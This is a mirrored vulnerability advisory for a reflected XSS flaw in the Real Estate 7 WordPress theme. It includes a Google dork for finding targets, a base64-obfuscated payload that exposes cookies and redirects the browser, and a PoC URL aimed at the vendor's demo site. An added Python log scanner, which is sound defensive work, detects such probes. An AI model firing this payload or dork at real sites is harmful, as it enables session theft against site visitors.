Real Estate 7 WordPress v3.0.3 - Unauthenticated Reflected XSS

CVE: N/A
Category: CWE-79
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-07-23
CPE: cpe:cpe:/a:wordpress:real-estate:3.0.3
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070119

Below is a copy:

Real Estate 7 WordPress v3.0.3 - Unauthenticated Reflected XSS
[+] Exploit Title: Real Estate 7 WordPress v3.0.3 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/realestate-7/
[+] Date: 2020-07-23
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chris Robinson [ https://www.contempothemes.com ]
[+] Software Version: 3.0.3
[+] Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Real Estate 7 theme v3.0.3 for WordPress.



### [ Payload: ]

[$] "><img src=x onerror=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`));>



### [ PoC: ]

[!] https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3B%3E

[!] GET /wp-real-estate-7/elementor-demo/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3B%3E HTTP/1.1
Host: contempothemes.com
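For defenders who want to find probes like the PoC above in their own web server logs, the following is an added example (not part of the original advisory and not the theme's own code). It URL-decodes the query string of each request, looks only at the reflected parameter named in the advisory (`ct_keyword`), and flags values that contain an HTML tag, an inline event handler, a `javascript:` URL or an `eval`/`atob` call. The log lines are constructed for illustration in combined log format; the request path in the second line is the one quoted in the PoC. The fix on the application side is to escape the value before echoing it (in WordPress, `esc_attr()` for attribute context), which this detector does not replace.

```python
"""Flag reflected-XSS probes against the ct_keyword parameter in access logs.

Added example, not part of the original advisory. SAMPLE_LOG is constructed;
only the request path of the second entry is taken from the advisory's PoC.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Patterns that indicate HTML/JS injection once the value is URL-decoded.
XSS_PATTERNS = [
    re.compile(r"<\s*[a-z]", re.I),        # start of an HTML tag such as <img
    re.compile(r"\bon[a-z]+\s*=", re.I),   # inline event handler: onerror=, onload=, ...
    re.compile(r"javascript\s*:", re.I),   # javascript: URL scheme
    re.compile(r"\b(eval|atob)\s*\(", re.I),  # common payload-decoding calls
]

# Parameters the theme reflects into the page; ct_keyword is the one in the advisory.
WATCHED_PARAMS = {"ct_keyword"}

# Combined/common log format up to the status code; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

POC_PATH = (
    "/wp-real-estate-7/elementor-demo/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3D"
    "eval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5j"
    "b29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3B%3E"
)

# Constructed sample log: one benign search, the PoC request, and a benign search
# whose "<" is an arithmetic comparison, not a tag (must not be flagged).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Jul/2020:10:01:12 +0000] "GET /wp-real-estate-7/elementor-demo/'
    '?ct_keyword=condo+downtown HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jul/2020:10:02:45 +0000] "GET ' + POC_PATH + ' HTTP/1.1" 200 5180 "-" "curl/7.64.0"',
    '203.0.113.9 - - [23/Jul/2020:10:03:01 +0000] "GET /wp-real-estate-7/elementor-demo/'
    '?ct_keyword=price+%3C+3000 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def suspicious_params(target: str) -> dict:
    """Return {param: [decoded values matching an XSS pattern]} for a request target."""
    query = urlsplit(target).query
    hits = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            decoded = unquote(value)  # second decode catches double-encoded payloads
            if any(p.search(decoded) for p in XSS_PATTERNS):
                hits.setdefault(name, []).append(decoded)
    return hits


def scan_log(lines) -> list:
    """Return (ip, timestamp, param, decoded value) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; skip rather than crash on malformed input
        for param, values in suspicious_params(m["target"]).items():
            for v in values:
                findings.append((m["ip"], m["ts"], param, v))
    return findings


if __name__ == "__main__":
    for ip, ts, param, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {param}={value[:60]!r}")
```

Running the block prints one finding, the PoC request, and stays silent on both benign searches; the `price < 3000` case is included because a naive check for `<` alone would flag it.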



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
